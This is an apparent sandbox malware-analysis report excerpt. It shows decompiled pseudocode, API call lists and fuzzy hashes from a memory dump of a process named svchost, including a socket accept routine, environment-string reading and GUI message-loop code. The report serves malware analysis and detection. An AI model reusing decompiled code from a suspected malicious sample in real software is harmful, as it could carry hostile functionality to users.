    						_push(0x8078);
    						_push( *((intOrPtr*)(_t64 + 0x1c)));
    						_push(_t63);
    						_v612 = 0x10;
    						if( *0x4926b0() == 0xffffffff) {
    							L8:
    							E00429F80(_t64, _t63);
    							return 0;
    						} else {
    							_push( &_v628);
    							_push( &_v624);
    							_push(_t63);
    							if( *0x4926a8() == 0xffffffff) {
    								goto L8;
    							} else {
    								_t43 =  *0x4926c0(_v632);
    								if(_t43 == 0) {
    									goto L8;
    								} else {
    									E0040B860(_t64 + 0x48, _t64, _t63);
    									wsprintfA( &_v548, "%s:%d");
    									E00482580(_t64 + 0x5c,  *((intOrPtr*)(_t64 + 0x64)),  &_v540);
    									 *((intOrPtr*)( *_t64 + 0xc4))( &_v548, _t43, _v642 & 0x0000ffff);
    									return 0;
    								}
    							}
    						}
    					} else {
    						return 0;
    					}
    				} else {
    					return 0;
    				}
    			}
    0x0042a1d7
    0x0042a1de
    0x0042a1ff
    0x0042a20c
    0x0042a21a
    0x0042a21f
    0x0042a232
    0x0042a234
    0x0042a239
    0x0042a23a
    0x0042a23b
    0x0042a24c
    0x0042a2cb
    0x0042a2ce
    0x0042a2de
    0x0042a24e
    0x0042a256
    0x0042a257
    0x0042a258
    0x0042a262
    0x00000000
    0x0042a264
    0x0042a26f
    0x0042a273
    0x00000000
    0x0042a275
    0x0042a279
    0x0042a294
    0x0042a2a9
    0x0042a2b7
    0x0042a2c8
    0x0042a2c8
    0x0042a273
    0x0042a262
    0x0042a222
    0x0042a22b
    0x0042a22b
    0x0042a1e1
    0x0042a1ea
    0x0042a1ea

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: accept
    • String ID: %s:%d$P
    • API String ID: 3005279540-612342447
    • Opcode ID: 16c94a39f4dc8cb8a9edbd8b46e5db72f03e7e85788da1e3e05598827bfb86fa
    • Instruction ID: 809c778831b6bc2ffd921b9bfe6175c6ff4d505ed4de893e689482a9c52e3608
    • Opcode Fuzzy Hash: 16c94a39f4dc8cb8a9edbd8b46e5db72f03e7e85788da1e3e05598827bfb86fa
    • Instruction Fuzzy Hash: B4317531204601AFD314EB28EC989BB73E8FFD4325F404B2EF591922D0EBB599198B65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E00462670(signed long long __fp0, char _a4, intOrPtr _a8, short* _a12, char* _a16, intOrPtr _a20) {
    				char _v248;
    				char _v256;
    				intOrPtr _v260;
    				intOrPtr _v264;
    				signed int _v268;
    				signed int _v272;
    				signed int _v276;
    				signed int _v280;
    				signed int _v284;
    				signed long long _v288;
    				void* _v292;
    				intOrPtr* _t165;
    				void* _t197;
    				signed int _t203;
    				void* _t205;
    				signed int* _t207;
    				short* _t210;
    				signed int _t218;
    				char* _t224;
    				signed int _t225;
    				signed int _t228;
    				intOrPtr* _t229;
    				char* _t241;
    				signed long long _t247;
    				signed int _t253;
    				signed int _t264;
    				intOrPtr _t273;
    				signed int _t274;
    				signed long long _t289;
    				signed int _t292;
    				intOrPtr _t302;
    				intOrPtr _t318;
    				signed long long _t336;
    				intOrPtr _t342;
    
    				_t247 = __fp0;
    				_t210 = _a12;
    				_t207 =  *(_a8 + 0x50);
    				_t205 =  *((intOrPtr*)(_a4 + 0x140)) + 0x80;
    				_t165 =  &_v256;
    				_v272 = 8;
    				do {
    					_t225 =  *((intOrPtr*)(_t210 + 0x70));
    					_t218 =  *((intOrPtr*)(_t210 + 0x60));
    					if(( *(_t210 + 0x10) |  *(_t210 + 0x20) |  *(_t210 + 0x30) |  *(_t210 + 0x40) |  *(_t210 + 0x50) | _t218 | _t225) != 0) {
    						_v292 =  *_t210;
    						asm("fild dword [esp+0x10]");
    						_v292 =  *(_t210 + 0x20);
    						asm("fild dword [esp+0x10]");
    						asm("fmulp st1, st0");
    						_v292 =  *(_t210 + 0x40);
    						_v268 = _t207[0x10];
    						asm("fild dword [esp+0x10]");
    						_v292 = _t218;
    						asm("fmulp st1, st0");
    						asm("fild dword [esp+0x10]");
    						asm("fmulp st1, st0");
    						_v276 = _t207[0x30];
    						_v292 =  *(_t210 + 0x10);
    						_t253 = st0 + st2;
    						_v284 = _t253;
    						asm("fxch st0, st1");
    						asm("fxch st0, st1");
    						st0 = _t253 - st1;
    						_v288 = (_v268 - _v276) *  *0x49a7c0 - st1;
    						_v260 = st0 + _v284;
    						_t264 = _v284 - st1;
    						_v276 = _t264;
    						st0 = _t264;
    						_v268 = _v288 + st1;
    						asm("fild dword [esp+0x10]");
    						_v292 =  *(_t210 + 0x30);
    						asm("fmulp st1, st0");
    						asm("fild dword [esp+0x10]");
    						_v292 =  *(_t210 + 0x50);
    						asm("fmulp st1, st0");
    						asm("fild dword [esp+0x10]");
    						asm("fmulp st1, st0");
    						_v292 = _t225;
    						asm("fild dword [esp+0x10]");
    						asm("fmulp st1, st0");
    						_v280 = _t207[0x38];
    						_t273 = st0 + st2;
    						_v292 = _t273;
    						_t274 = _t273 - st1;
    						_v284 = _t274;
    						st0 = _t274;
    						_v288 = _v280 + st1;
    						_v280 = _v288 + _v292;
    						asm("fsubr st0, st1");
    						_v264 = _v284 *  *0x49a7b8 - _v280;
    						_t289 = (_v288 - _v292) *  *0x49a7c0 - _v264;
    						_v288 = _t289;
    						asm("fxch st0, st1");
    						_t292 = _t289 *  *0x49a7b4 - st1 + _v288;
    						_v284 = _t292;
    						st0 = _t292;
    						 *_t165 = _v280 + _v260;
    						 *((intOrPtr*)(_t165 + 0xe0)) = _v260 - _v280;
    						 *((intOrPtr*)(_t165 + 0x20)) = _v264 + _v268;
    						 *((intOrPtr*)(_t165 + 0xc0)) = _v268 - _v264;
    						_t302 = _v288 + st1;
    						 *((intOrPtr*)(_t165 + 0x40)) = _t302;
    						 *((intOrPtr*)(_t165 + 0xa0)) = _t302 - _v288;
    						 *((intOrPtr*)(_t165 + 0x80)) = _v284 + _v276;
    						_t247 = _v276 - _v284;
    						 *((intOrPtr*)(_t165 + 0x60)) = _t247;
    					} else {
    						_v292 =  *_t210;
    						asm("fild dword [esp+0x10]");
    						_t247 = _t247 *  *_t207;
    						asm("fst dword [eax]");
    						asm("fst dword [eax+0x20]");
    						asm("fst dword [eax+0x40]");
    						asm("fst dword [eax+0x60]");
    						asm("fst dword [eax+0x80]");
    						asm("fst dword [eax+0xa0]");
    						asm("fst dword [eax+0xc0]");
    						 *((intOrPtr*)(_t165 + 0xe0)) = _t247;
    					}
    					_t210 = _t210 + 2;
    					_t207 =  &(_t207[1]);
    					_t165 = _t165 + 4;
    					_t228 = _v272 - 1;
    					_v272 = _t228;
    				} while (_t228 != 0);
    				_t241 = _a16;
    				_t229 =  &_v248;
    				_v268 = 8;
    				do {
    					_t224 =  *_t241 + _a20;
    					_v272 =  *((intOrPtr*)(_t229 - 8)) -  *((intOrPtr*)(_t229 + 8));
    					_v288 = ( *_t229 -  *((intOrPtr*)(_t229 + 0x10))) *  *0x49a7c0 - st1;
    					_t318 = st0 + st2;
    					_v260 = _t318;
    					asm("fxch st0, st1");
    					asm("fxch st0, st1");
    					st0 = _t318 - st1;
    					_v276 = _v272 - _v288;
    					_v288 =  *((intOrPtr*)(_t229 + 0x14)) +  *((intOrPtr*)(_t229 - 4));
    					_v272 =  *((intOrPtr*)(_t229 - 4)) -  *((intOrPtr*)(_t229 + 0x14));
    					_v280 = _v288 + st2;
    					_t336 = (_v272 + st1) *  *0x49a7bc;
    					_v292 = _t336;
    					asm("fsubr dword [esp+0x10]");
    					_v264 = _t336 *  *0x49a7b8 - _v280;
    					_t342 = (_v288 - st1) *  *0x49a7c0 - _v264;
    					_v288 = _t342;
    					st0 = _t342;
    					_v284 = _v272 *  *0x49a7b4 - _v292 + _v288;
    					 *_t224 =  *((intOrPtr*)((E00470388() + 0x00000004 >> 0x00000003 & 0x000003ff) + _t205));
    					 *((char*)(_t224 + 7)) =  *((intOrPtr*)((E00470388() + 0x00000004 >> 0x00000003 & 0x000003ff) + _t205));
    					 *((char*)(_t224 + 1)) =  *((intOrPtr*)((E00470388() + 0x00000004 >> 0x00000003 & 0x000003ff) + _t205));
    					 *((char*)(_t224 + 6)) =  *((intOrPtr*)((E00470388() + 0x00000004 >> 0x00000003 & 0x000003ff) + _t205));
    					 *((char*)(_t224 + 2)) =  *((intOrPtr*)((E00470388() + 0x00000004 >> 0x00000003 & 0x000003ff) + _t205));
    					 *((char*)(_t224 + 5)) =  *((intOrPtr*)((E00470388() + 0x00000004 >> 0x00000003 & 0x000003ff) + _t205));
    					 *((char*)(_t224 + 4)) =  *((intOrPtr*)((E00470388() + 0x00000004 >> 0x00000003 & 0x000003ff) + _t205));
    					_t197 = E00470388();
    					_t229 = _t229 + 0x20;
    					_t241 =  &_a4;
    					 *((char*)(_t224 + 3)) =  *((intOrPtr*)((_t197 + 0x00000004 >> 0x00000003 & 0x000003ff) + _t205));
    					_t203 = _v268 - 1;
    					_v268 = _t203;
    				} while (_t203 != 0);
    				return _t203;
    			}
    0x00462670
    0x00462684
    0x00462692
    0x00462698
    0x0046269e
    0x004626a2
    0x004626aa
    0x004626be
    0x004626ca
    0x004626d5
    0x0046270f
    0x00462713
    0x00462720
    0x00462724
    0x0046272c
    0x0046272e
    0x00462735
    0x0046273f
    0x00462743
    0x00462747
    0x0046274f
    0x00462753
    0x00462759
    0x0046275d
    0x00462763
    0x00462769
    0x0046276d
    0x00462771
    0x00462773
    0x0046278d
    0x00462797
    0x0046279f
    0x004627a1
    0x004627a5
    0x004627ad
    0x004627b8
    0x004627bc
    0x004627c4
    0x004627c9
    0x004627cd
    0x004627d1
    0x004627d9
    0x004627dd
    0x004627e8
    0x004627ec
    0x004627f0
    0x004627f2
    0x004627f8
    0x004627fa
    0x004627fe
    0x00462800
    0x00462804
    0x0046280c
    0x0046281c
    0x00462836
    0x0046283c
    0x0046284e
    0x00462852
    0x00462856
    0x00462860
    0x00462864
    0x00462868
    0x00462872
    0x0046287c
    0x0046288a
    0x00462895
    0x0046289f
    0x004628a1
    0x004628a8
    0x004628b6
    0x004628c0
    0x004628c4
    0x004626d7
    0x004626da
    0x004626de
    0x004626e2
    0x004626e4
    0x004626e6
    0x004626e9
    0x004626ec
    0x004626ef
    0x004626f5
    0x004626fb
    0x00462701
    0x00462701
    0x004628cb
    0x004628ce
    0x004628d1
    0x004628d4
    0x004628d5
    0x004628d5
    0x004628df
    0x004628e6
    0x004628ea
    0x004628f2
    0x00462908
    0x0046290a
    0x00462920
    0x00462926
    0x00462928
    0x0046292c
    0x00462930
    0x00462932
    0x00462944
    0x0046295a
    0x00462964
    0x0046296e
    0x00462978
    0x0046297e
    0x00462988
    0x00462990
    0x004629a0
    0x004629a4
    0x004629a8
    0x004629bc
    0x004629e3
    0x004629f8
    0x00462a18
    0x00462a36
    0x00462a54
    0x00462a70
    0x00462a8a
    0x00462a8d
    0x00462a95
    0x00462aa0
    0x00462aa6
    0x00462aad
    0x00462aae
    0x00462aae
    0x00462ac2

    APIs
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: __ftol
    • String ID:
    • API String ID: 495808979-0
    • Opcode ID: f6279cb91c322ea7e4f9f9d3633a8d8b7f6129db6ce223f474c502b3f88a86cc
    • Instruction ID: 9c4059c8116cd24199c74e987a124d368cd11e9d63366b6d0c6c5600dd8f57bb
    • Opcode Fuzzy Hash: f6279cb91c322ea7e4f9f9d3633a8d8b7f6129db6ce223f474c502b3f88a86cc
    • Instruction Fuzzy Hash: 4BD132B2909342DFD301AF21D08925ABBB0FFD4744FA64999E0D56626AE331C578CF86
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004748E0() {
    				int _v4;
    				int _v8;
    				intOrPtr _t7;
    				CHAR* _t9;
    				WCHAR* _t17;
    				int _t20;
    				char* _t24;
    				int _t32;
    				CHAR* _t36;
    				WCHAR* _t38;
    				void* _t39;
    				int _t42;
    
    				_t7 =  *0x4e1940; // 0x1
    				_t32 = 0;
    				_t38 = 0;
    				_t36 = 0;
    				if(_t7 != 0) {
    					if(_t7 != 1) {
    						if(_t7 != 2) {
    							L27:
    							return 0;
    						}
    						L18:
    						if(_t36 != _t32) {
    							L20:
    							_t9 = _t36;
    							if( *_t36 == _t32) {
    								L23:
    								_t41 = _t9 - _t36 + 1;
    								_t39 = E00471697(_t9 - _t36 + 1);
    								if(_t39 != _t32) {
    									E00472FB0(_t39, _t36, _t41);
    								} else {
    									_t39 = 0;
    								}
    								FreeEnvironmentStringsA(_t36);
    								return _t39;
    							} else {
    								goto L21;
    							}
    							do {
    								do {
    									L21:
    									_t9 =  &(_t9[1]);
    								} while ( *_t9 != _t32);
    								_t9 =  &(_t9[1]);
    							} while ( *_t9 != _t32);
    							goto L23;
    						}
    						_t36 = GetEnvironmentStrings();
    						if(_t36 == _t32) {
    							goto L27;
    						}
    						goto L20;
    					}
    					L6:
    					if(_t38 != _t32) {
    						L8:
    						_t17 = _t38;
    						if( *_t38 == _t32) {
    							L11:
    							_t20 = (_t17 - _t38 >> 1) + 1;
    							_v4 = _t20;
    							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
    							if(_t42 != _t32) {
    								_t24 = E00471697(_t42);
    								_v8 = _t24;
    								if(_t24 != _t32) {
    									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
    										E004715AE(_v8);
    										_v8 = _t32;
    									}
    									_t32 = _v8;
    								}
    							}
    							FreeEnvironmentStringsW(_t38);
    							return _t32;
    						} else {
    							goto L9;
    						}
    						do {
    							do {
    								L9:
    								_t17 =  &(_t17[1]);
    							} while ( *_t17 != _t32);
    							_t17 =  &(_t17[1]);
    						} while ( *_t17 != _t32);
    						goto L11;
    					}
    					_t38 = GetEnvironmentStringsW();
    					if(_t38 == _t32) {
    						goto L27;
    					}
    					goto L8;
    				}
    				_t38 = GetEnvironmentStringsW();
    				if(_t38 == 0) {
    					_t36 = GetEnvironmentStrings();
    					if(_t36 == 0) {
    						goto L27;
    					}
    					 *0x4e1940 = 2;
    					goto L18;
    				}
    				 *0x4e1940 = 1;
    				goto L6;
    			}
    0x004748e2
    0x004748f1
    0x004748f3
    0x004748f5
    0x004748f9
    0x00474931
    0x004749bb
    0x00474a09
    0x00000000
    0x00474a09
    0x004749bd
    0x004749bf
    0x004749cd
    0x004749cf
    0x004749d1
    0x004749dd
    0x004749e0
    0x004749e8
    0x004749ed
    0x004749f6
    0x004749ef
    0x004749ef
    0x004749ef
    0x004749ff
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004749d3
    0x004749d3
    0x004749d3
    0x004749d3
    0x004749d4
    0x004749d8
    0x004749d9
    0x00000000
    0x004749d3
    0x004749c7
    0x004749cb
    0x00000000
    0x00000000
    0x00000000
    0x004749cb
    0x00474937
    0x00474939
    0x00474947
    0x0047494a
    0x0047494c
    0x0047495c
    0x00474968
    0x0047496f
    0x00474975
    0x00474979
    0x0047497c
    0x00474984
    0x00474988
    0x00474999
    0x0047499f
    0x004749a5
    0x004749a5
    0x004749a9
    0x004749a9
    0x00474988
    0x004749ae
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0047494e
    0x0047494e
    0x0047494e
    0x0047494f
    0x00474950
    0x00474956
    0x00474957
    0x00000000
    0x0047494e
    0x0047493d
    0x00474941
    0x00000000
    0x00000000
    0x00000000
    0x00474941
    0x004748fd
    0x00474901
    0x00474915
    0x00474919
    0x00000000
    0x00000000
    0x0047491f
    0x00000000
    0x0047491f
    0x00474903
    0x00000000

    APIs
    • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0046FDF2), ref: 004748FB
    • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0046FDF2), ref: 0047490F
    • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0046FDF2), ref: 0047493B
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0046FDF2), ref: 00474973
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0046FDF2), ref: 00474995
    • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,0046FDF2), ref: 004749AE
    • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0046FDF2), ref: 004749C1
    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004749FF
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: EnvironmentStrings$ByteCharFreeMultiWide
    • String ID:
    • API String ID: 1823725401-0
    • Opcode ID: f390ea38b9152bbb38d531475fff5d16c81597ed866802095eafa9c2050ade0a
    • Instruction ID: c8cfb7c029db317747a212152139d9000991915c5b2a8a7c9a9de51af1cee6e0
    • Opcode Fuzzy Hash: f390ea38b9152bbb38d531475fff5d16c81597ed866802095eafa9c2050ade0a
    • Instruction Fuzzy Hash: 143135F25042656F97303BB89CC48BFBA9CE6C53587158A3FF65AC3210E7288C4186AD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00424D20(intOrPtr __ecx, void* __fp0, intOrPtr _a4, int* _a8, long* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
    				int _v4;
    				int _v8;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				long _v32;
    				struct tagRECT _v48;
    				struct tagRECT _v64;
    				struct tagRECT _v80;
    				intOrPtr _v84;
    				int _v88;
    				intOrPtr _v92;
    				intOrPtr _v96;
    				int _v100;
    				intOrPtr _v104;
    				void* __ebp;
    				intOrPtr _t72;
    				int* _t74;
    				long* _t75;
    				intOrPtr _t79;
    				int _t80;
    				void* _t95;
    				int _t101;
    				intOrPtr _t102;
    				int _t105;
    				int _t107;
    				int* _t108;
    				intOrPtr _t110;
    				int _t124;
    				int _t138;
    				int _t139;
    				intOrPtr _t142;
    				void* _t160;
    
    				_t160 = __fp0;
    				_t72 = _a16;
    				_v96 = __ecx;
    				if(_t72 < 1 || _t72 > 8 || _a24 < 2) {
    					L26:
    					__eflags = 0;
    					return 0;
    				} else {
    					_t74 = _a8;
    					_t139 =  *_t74;
    					_t138 = _t74[1];
    					_t107 = _t74[2];
    					_v8 = _t107;
    					_t108 = _t107 - _t139;
    					_t101 = _t74[3];
    					_a8 = _t108;
    					_v4 = _t101;
    					if(_t108 <= 0) {
    						goto L26;
    					} else {
    						_t102 = _t101 - _t138;
    						_v84 = _t102;
    						if(_t102 <= 0) {
    							goto L26;
    						} else {
    							_t75 = _a12;
    							if(_t75 != 0) {
    								_v48.left =  *_t75;
    								_v48.top = _t75[1];
    								_v48.right = _t75[2];
    								_v48.bottom = _t75[3];
    							}
    							_t124 = 0;
    							_v92 = 1;
    							_v100 = 0;
    							if(_t102 > 0) {
    								_t142 =  *0x492494;
    								while(1) {
    									_v104 = 0x32;
    									_t79 = _t102 - _t124;
    									if(_t79 <= 0x32) {
    										_v104 = _t79;
    									}
    									_t80 = 0;
    									if(_t108 <= 0) {
    										goto L22;
    									}
    									_v88 = _v104 + _t124;
    									do {
    										_t110 = _t108 - _t80;
    										if(_t110 > 0x32) {
    											_t110 = 0x32;
    										}
    										_t105 = _t110 + _t80;
    										SetRect( &_v80, _t80, _t124, _t105, _v88);
    										OffsetRect( &_v80, _t139, _t138);
    										if(_a12 != 0) {
    											IntersectRect( &_v80,  &_v80,  &_v48);
    										}
    										if(IsRectEmpty( &_v80) != 0) {
    											goto L20;
    										} else {
    											_v64.top = _v80.top;
    											_v64.left = _v80.left;
    											_v64.right = _v80.right;
    											_v64.bottom = _v80.bottom;
    											OffsetRect( &_v64,  ~_t139,  ~_t138);
    											_v24 = _v64.right;
    											_v32 = _v64.left;
    											_v28 = _v64.top;
    											_v20 = _v64.bottom;
    											_t95 = E00424330(_v96, _t160, _a16, _v8 - _t139, _v4 - _t138, _a20, _a24,  &_v32);
    											_t157 = _t95 - 1;
    											if(_t95 != 1) {
    												_v92 = 0;
    											} else {
    												_push(_a28);
    												_push(_v80.top);
    												_push(_v80.left);
    												E00424BE0(_v96, _t142, _t157, _a4);
    												goto L20;
    											}
    										}
    										goto L25;
    										L20:
    										_t108 = _a8;
    										_t124 = _v100;
    										_t80 = _t105;
    									} while (_t80 < _t108);
    									_t102 = _v84;
    									L22:
    									_t124 = _t124 + _v104;
    									_v100 = _t124;
    									if(_t124 < _t102) {
    										continue;
    									}
    									goto L25;
    								}
    							}
    							L25:
    							E00423EF0(_v96);
    							return _v92;
    						}
    					}
    				}
    			}

    APIs
    • SetRect.USER32(?,00000000,00000032,00000032,?), ref: 00424E09
    • OffsetRect.USER32(?,?,?), ref: 00424E16
    • IntersectRect.USER32(?,?,?), ref: 00424E32
    • IsRectEmpty.USER32(?), ref: 00424E3D
    • OffsetRect.USER32(?,?,?), ref: 00424E7A
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$Offset$EmptyIntersect
    • String ID: 2
    • API String ID: 765610062-450215437
    • Opcode ID: 47de2460904ce778aa9f134a4f409e8f97a0f5e5b9c6d25e81132d965d15c7c2
    • Instruction ID: b2abdc1cb0440d022a9c70847020d8c1bd12ad97ac357666a244aef23a30882a
    • Opcode Fuzzy Hash: 47de2460904ce778aa9f134a4f409e8f97a0f5e5b9c6d25e81132d965d15c7c2
    • Instruction Fuzzy Hash: 096113756083419FD318CF29D984A6BBBE9FBC8304F548A2EF58987320D774E905CB56
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 97%
    			E00486E8F(intOrPtr* __ecx) {
    				struct HWND__* _t45;
    				intOrPtr* _t54;
    				int _t63;
    				signed int _t66;
    				intOrPtr _t67;
    				intOrPtr* _t78;
    				struct tagMSG* _t80;
    				void* _t81;
    
    				_t67 = 1;
    				_t78 = __ecx;
    				 *((intOrPtr*)(_t81 + 0x18)) = _t67;
    				 *(_t81 + 0x14) = 0;
    				if(( *(_t81 + 0x28) & 0x00000004) == 0) {
    					L2:
    					 *((intOrPtr*)(_t81 + 0x10)) = 0;
    					L3:
    					_t45 = GetParent( *(_t78 + 0x1c));
    					 *(_t78 + 0x24) =  *(_t78 + 0x24) | 0x00000018;
    					 *(_t81 + 0x1c) = _t45;
    					_t80 = L00487FB8() + 0x30;
    					L4:
    					while( *((intOrPtr*)(_t81 + 0x18)) == 0 || PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
    						while( *((intOrPtr*)( *((intOrPtr*)(L00487FB8())) + 0x5c))() != 0) {
    							if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
    								_t63 = _t80->message;
    								if(_t63 == 0x118 || _t63 == 0x104) {
    									E00487621(_t78, 1);
    									UpdateWindow( *(_t78 + 0x1c));
    									 *((intOrPtr*)(_t81 + 0x10)) = 0;
    								}
    							}
    							if( *((intOrPtr*)( *_t78 + 0x70))() == 0) {
    								 *(_t78 + 0x24) =  *(_t78 + 0x24) & 0xffffffe7;
    								return  *((intOrPtr*)(_t78 + 0x2c));
    							} else {
    								_t54 = L00487FB8();
    								_push(_t80);
    								if( *((intOrPtr*)( *_t54 + 0x64))() != 0) {
    									 *((intOrPtr*)(_t81 + 0x18)) = 1;
    									 *(_t81 + 0x14) = 0;
    								}
    								if(PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
    									continue;
    								} else {
    									goto L4;
    								}
    							}
    						}
    						return E0048DABD(0) | 0xffffffff;
    					}
    					if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
    						E00487621(_t78, 1);
    						UpdateWindow( *(_t78 + 0x1c));
    						 *((intOrPtr*)(_t81 + 0x10)) = 0;
    					}
    					if(( *(_t81 + 0x24) & 0x00000001) == 0 &&  *(_t81 + 0x1c) != 0 &&  *(_t81 + 0x14) == 0) {
    						SendMessageA( *(_t81 + 0x28), 0x121, 0,  *(_t78 + 0x1c));
    					}
    					if(( *(_t81 + 0x24) & 0x00000002) != 0) {
    						L14:
    						 *((intOrPtr*)(_t81 + 0x18)) = 0;
    						goto L4;
    					} else {
    						 *(_t81 + 0x14) =  *(_t81 + 0x14) + 1;
    						if(SendMessageA( *(_t78 + 0x1c), 0x36a, 0,  *(_t81 + 0x14)) != 0) {
    							goto L4;
    						}
    						goto L14;
    					}
    				}
    				_t66 = E004874EA(__ecx);
    				 *((intOrPtr*)(_t81 + 0x10)) = _t67;
    				if((_t66 & 0x10000000) == 0) {
    					goto L3;
    				}
    				goto L2;
    			}

    APIs
    • GetParent.USER32(?), ref: 00486EC3
    • PeekMessageA.USER32 ref: 00486EEC
    • UpdateWindow.USER32(?), ref: 00486F08
    • SendMessageA.USER32(?,00000121,00000000,?), ref: 00486F2E
    • SendMessageA.USER32(?,0000036A,00000000,00000001), ref: 00486F4D
    • UpdateWindow.USER32(?), ref: 00486F90
    • PeekMessageA.USER32 ref: 00486FC3
      • Part of subcall function 004874EA: GetWindowLongA.USER32(?,000000F0), ref: 004874F6
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Message$Window$PeekSendUpdate$LongParent
    • String ID:
    • API String ID: 2853195852-0
    • Opcode ID: 5d80c3546c3c06cbc9cf61fb37afc56697750ee0b74688dac5dc1ecd0fd277dd
    • Instruction ID: 50af27898e8295f3eddc0b00c52b135bbb950d658d7d0c2e19d690325be9f92d
    • Opcode Fuzzy Hash: 5d80c3546c3c06cbc9cf61fb37afc56697750ee0b74688dac5dc1ecd0fd277dd
    • Instruction Fuzzy Hash: 1741D030608341ABD760AF26D948E2FBAE4FFC1B14F110D2FF68192291D779D944CB9A
